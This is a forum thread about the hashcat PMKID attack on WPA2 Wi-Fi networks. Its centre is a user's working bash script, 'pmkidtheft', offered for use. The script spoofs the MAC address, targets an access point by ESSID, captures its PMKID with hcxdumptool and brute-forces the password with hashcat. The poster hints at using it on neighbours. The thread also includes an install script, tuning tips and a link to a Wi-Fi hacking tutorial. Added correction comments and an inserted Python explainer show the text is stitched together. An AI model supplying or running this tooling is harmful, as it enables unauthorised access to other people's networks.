Exmix Posted August 8, 2018 (edited)
I found this the other day and thought if some of you haven't seen it, you might find it interesting. I have yet to test it myself but plan to soon.
Hashcat PMKID
Edited August 8, 2018 by Exmix
theUNK0WN Posted August 8, 2018
Interesting! I will have to read up on this when I have time.
Forkish Posted August 8, 2018
If you're an auditory learner, the latest Security Now podcast with Steve Gibson is about this.
PoSHMagiC0de Posted August 12, 2018
Tried it, it works. Better if you use the parameters --filtermode=2 --filterlist=<text file with bssids you are targeting>. Otherwise it goes after every beacon it hears. You also have to manually break when you see the status say pownd=1, as it means it has gotten a PMKID. Have to check if there is a param to quit after 1 PMKID is captured for automation.
L07TB0Y Posted August 18, 2018
Now can someone port it over to PineApple?
vailixi Posted August 30, 2018
This is a hasty first draft. I scripted this attack. It's 5:20AM here and I haven't slept. (Neighborhood watch) This is most of what you need to get started. I've included an install script below as well. You'll need to run both as root.

Usage:
./pmkidtheft -E <ESSID>

#!/bin/bash
# pmkidtheft: capture a PMKID from one target AP with hcxdumptool and hand it to hashcat
echo " _____ __ __ _ _______ _____ _______ _ _ ______ ______ _______ "
echo " | __ \| \/ | |/ /_ _| __ \__ __| | | | ____| ____|__ __|"
echo " | |__) | \ / | ' / | | | | | | | | | |__| | |__ | |__ | | "
echo " | ___/| |\/| | < | | | | | | | | | __ | __| | __| | | "
echo " | | | | | | . \ _| |_| |__| | | | | | | | |____| | | | "
echo " |_| |_| |_|_|\_\_____|_____/ |_| |_| |_|______|_| |_| "
echo " Automated WPA2 PMKID cracking tool by Vailixi 2018"
#### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU ####

usage() {
  printf "\n USAGE:\n pmkidtheft -E <ESSID>\n\n"
}

POSITIONAL=()
while [[ $# -gt 0 ]]; do
  key="$1"
  case $key in
    -h|--help)
      usage
      exit 0
      ;;
    -E|--ESSID)
      ESSID="$2"
      shift # past argument
      shift # past value
      ;;
    *) # unknown option
      POSITIONAL+=("$1") # save it in an array for later
      shift # past argument
      ;;
  esac
done
set -- "${POSITIONAL[@]}" # restore positional parameters

# The original checked "$# -eq 0" here, which is always true after a valid "-E <ESSID>"
# call because the parser consumes -E and its value; check the ESSID itself instead.
if [ -z "$ESSID" ]; then
  usage
  exit 1
fi

# stop everything that would otherwise fight over the wireless interface
systemctl stop NetworkManager
systemctl stop wpa_supplicant
systemctl stop dhclient
airmon-ng check kill

# first wireless interface (wl*), ignoring an already existing monitor interface
wifi=$(ifconfig | grep '^wl' | cut -d ' ' -f 1 | sed s/://g | grep -v 'mon' | head -n 1)
ifconfig "$wifi" down
macchanger -r "$wifi"
ifconfig "$wifi" up
airmon-ng start "$wifi"
# the monitor interface only exists after airmon-ng start, so look it up now, not earlier
mon=$(ifconfig | grep '^wl' | cut -d ' ' -f 1 | sed s/://g | grep 'mon' | head -n 1)

# scan for 10 seconds; airodump-ng numbers its output files, so the CSV is wifis-01.csv
rm -f wifis-01.csv
timeout 10 airodump-ng "$mon" -w wifis --write-interval 5 -o csv
# hcxdumptool filter list: one BSSID per line, hex only, no colons
grep "$ESSID" wifis-01.csv | cut -d " " -f 1 | sed s/,//g | sed s/://g > mac.txt

# --filtermode=2 attacks only the BSSIDs listed in mac.txt; hcxdumptool runs until Ctrl+C,
# so break out once the status line reports a captured PMKID
hcxdumptool -o hash -i "$mon" --filterlist=mac.txt --filtermode=2 --enable_status=3
# convert the pcapng capture to hashcat's 16800 format (PMKID*MAC_AP*MAC_STA*ESSID)
hcxpcaptool -z /root/hashtocrack hash

hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force
hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show

# put the interface and the services back
airmon-ng stop "$mon"
systemctl start NetworkManager
systemctl start wpa_supplicant
systemctl start dhclient

#!/bin/bash
#### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU
apt-get update -y && apt-get dist-upgrade -y && apt-get install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev -y
apt-get install opencl -y
apt-get install ocl-icd-opencl-dev -y
# build each tool in its own directory (the original cd'd into the first clone and never
# came back out, so the later clones were nested inside it)
git clone https://github.com/ZerBea/hcxdumptool
(cd hcxdumptool && make && make install)
git clone https://github.com/ZerBea/hcxtools
(cd hcxtools && make && make install)
git clone https://github.com/hashcat/hashcat
(cd hashcat && make && make install)
icarus255 Posted October 23, 2018
I'm not sure why the PMKID attacks (and hcxdumptool) are not as well known or discussed as they should be. I know wifi has been done to death but people are still posting questions on the forums about why their deauth attacks aren't working or why they can't capture a 4-way handshake. To be honest, I didn't know about this attack vector until a week ago myself when I read a post on the hashcat forums (refer to the link in the OP or https://hashcat.net/forum/thread-7717-post-41446.html).

I tested hcxdumptool and there are several considerable advantages of using this new method over the "traditional" 4-way handshake approach, i.e. sometimes it's a lot easier to request a single EAPOL frame (with a PMKID) than waiting for or forcing a 4-way handshake. Only needing one EAPOL frame also means you can target client-less APs or AP-less clients (refer to the link above for details). Not all vendors/devices are vulnerable because sending the PMKID is optional, i.e. EAPOL frames do not need to contain the PMKID for an AP and client to authenticate. It doesn't seem to be a legacy issue; to me it seems that a lot of vendors leave it enabled by default.

There is also no advantage that I can see of using a captured PMKID over a captured 4-way handshake for "cracking purposes", i.e. you will have captured all the crypto values needed but in different ways. You will still have to brute-force/dictionary attack the key like you normally would with hashcat or JTR. Hashing speeds look similar from my unscientific tests using both modes in hashcat (someone please confirm).

In my opinion, the PMKID attack methods are a great alternative to the traditional 4-way handshake approach (if the device is vulnerable) because they can be less disruptive to the target network/device. I don't normally advocate automated tools but some of the options of hcxdumptool are definitely worth exploring.

On 8/11/2018 at 11:26 PM, PoSHMagiC0de said:
> Tried it, it works. Better if you use the parameters --filtermode=2 --filterlist=<text file with bssids you are targeting>. Otherwise it goes after every beacon it hears. You also have to manually break when you see the status say pownd=1, as it means it has gotten a PMKID.

Agree. Be careful running hcxdumptool the first time because the default attack mode is very aggressive, i.e. it will try all possible attacks (including deauth and disassociate) on any wifi device it picks up in range, so use a filter with your device bssids only.
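To make concrete why "all the crypto values needed" are present in a single EAPOL frame, here is an added example (not from this thread, hashcat or hcxtools) that implements the WPA2 PMK and PMKID derivation and checks a candidate passphrase against a line in hashcat's 16800 format; the MACs, ESSID and passphrase are constructed values. The only secret input is the PMK, so for an AP that includes the PMKID the passphrase's resistance to guessing is the whole defence, and each guess costs the same 4096-round PBKDF2 as a 4-way handshake guess, which matches the similar hashing speeds noted above.

```python
import hashlib
import hmac

# Constructed demo values (not captured from any real network).
AP_MAC = "aabbccddeeff"
STA_MAC = "112233445566"
ESSID = "TestNet"
PASSPHRASE = "correct horse battery staple"


def wpa2_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC), first 128 bits.
    Everything here except the PMK travels in the clear in the first EAPOL frame."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def to_16800(pmkid_bytes: bytes, ap_mac_hex: str, sta_mac_hex: str, essid: str) -> str:
    """hashcat -m 16800 line: PMKID*MAC_AP*MAC_STA*ESSID, all hex, no colons."""
    return "*".join([pmkid_bytes.hex(), ap_mac_hex, sta_mac_hex, essid.encode().hex()])


def parse_16800(line: str):
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(essid_hex).decode())


def pmkid_matches(line: str, candidate: str) -> bool:
    """One offline guess, as hashcat does it: derive the PMK, recompute the PMKID, compare."""
    captured, ap, sta, essid = parse_16800(line)
    return hmac.compare_digest(pmkid(wpa2_pmk(candidate, essid), ap, sta), captured)


def demo_line() -> str:
    """The 16800 line an AP using the constructed values above would yield."""
    pmk = wpa2_pmk(PASSPHRASE, ESSID)
    return to_16800(pmkid(pmk, bytes.fromhex(AP_MAC), bytes.fromhex(STA_MAC)), AP_MAC, STA_MAC, ESSID)


if __name__ == "__main__":
    line = demo_line()
    print(line)
    print("correct passphrase:", pmkid_matches(line, PASSPHRASE))
    print("wrong passphrase:  ", pmkid_matches(line, "password123"))
```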
nikmel420 Posted January 26, 2019 (edited)
https://github.com/hackthebox/PMKID
Yeah, there are modules out, but I can't seem to get them installed. I just learned of them recently and they work great using my regular Alfa adapters in Parrot or Kali. I can't wait till I figure out the step I'm missing to get it on the Pineapple.
Edited January 26, 2019 by nikmel420
FHXploit Posted February 25, 2019
If you want a tutorial on how to hack a wifi password using Windows, check this: https://www.fhxploit.com/2018/01/cara-hack-password-wi-fi-menggunakan.html